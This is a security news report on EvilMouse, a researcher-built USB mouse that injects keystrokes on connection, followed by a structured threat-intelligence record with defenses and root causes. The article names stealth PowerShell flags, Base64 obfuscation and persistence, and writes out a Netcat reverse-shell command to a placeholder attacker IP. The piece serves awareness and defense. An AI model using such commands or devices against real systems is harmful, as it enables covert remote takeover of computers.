EvilMouse: A $44 USB Mouse That Silently Hijacks Systems
Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures.
Unlike suspicious USB drives, EvilMouse retains normal mouse functionality optical tracking and buttons while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds.
The device executes DuckyScript-like sequences, including:
- Hidden PowerShell commands (
-WindowStyle Hidden -enc) - Base64-encoded payloads for obfuscation
- Reverse shells via Netcat (
nc -e cmd.exe attacker_ip 4444) - Persistence mechanisms (e.g., scheduled tasks)
In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma.
Security Implications
EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments.
Potential Defenses
- USB device whitelisting (Group Policy)
- Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)
- Physical port controls (Kensington locks)
The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses.
EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.
Source: https://cyberpress.org/44-evilmouse-can-autonomously-execute-commands-and-compromise-systems/
Microsoft TPRM report: https://www.rankiteo.com/company/microsoft-security-response-center
Amazon TPRM report: https://www.rankiteo.com/company/amazon
Apple TPRM report: https://www.rankiteo.com/company/apple
"id": "amaappmic1770935300",
"linkid": "amazon, apple, microsoft-security-response-center",
"type": "Vulnerability",
"date": "2/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'type': 'General Public, Organizations'}],
'attack_vector': 'USB Human Interface Device (HID) Exploitation',
'description': 'Security researcher NEWO-J unveiled EvilMouse, a low-cost, '
'fully functional USB mouse that covertly injects malicious '
'keystrokes upon connection. Built for under $44 using a '
'Raspberry Pi Pico RP2040 Zero microcontroller, the device '
'exploits trust in everyday peripherals to bypass security '
'measures. The device retains normal mouse functionality while '
'autonomously executing payloads, including hidden PowerShell '
'commands, reverse shells, and persistence mechanisms.',
'impact': {'operational_impact': 'Remote code execution (RCE), potential '
'system compromise',
'systems_affected': 'Windows 11, macOS Sonoma'},
'lessons_learned': 'EvilMouse highlights critical gaps in HID trust models, '
'USB hub relay security, and endpoint detection. '
'Organizations need to rethink peripheral supply chain '
'security and implement defenses like USB device '
'whitelisting and behavioral analytics.',
'motivation': 'Demonstration of hardware-based attack vectors, red teaming',
'post_incident_analysis': {'corrective_actions': 'Implement USB device '
'whitelisting, behavioral '
'analytics, and physical '
'port controls',
'root_causes': 'Exploitation of OS '
'auto-enumeration of HID devices, '
'lack of peripheral trust models, '
'and endpoint detection gaps'},
'recommendations': ['USB device whitelisting (Group Policy)',
'Behavioral analytics (e.g., CrowdStrike Falcon’s HID '
'monitoring)',
'Physical port controls (Kensington locks)'],
'references': [{'source': 'GitHub Repository',
'url': 'https://github.com/NEWO-J/evilmouse'}],
'response': {'enhanced_monitoring': 'Behavioral analytics (e.g., CrowdStrike '
'Falcon’s HID monitoring)'},
'threat_actor': 'NEWO-J (Security Researcher)',
'title': 'EvilMouse: A $44 USB Mouse That Silently Hijacks Systems',
'type': 'Hardware-based Attack',
'vulnerability_exploited': 'OS auto-enumeration of mice on Windows 11 and '
'macOS Sonoma, lack of HID trust models'}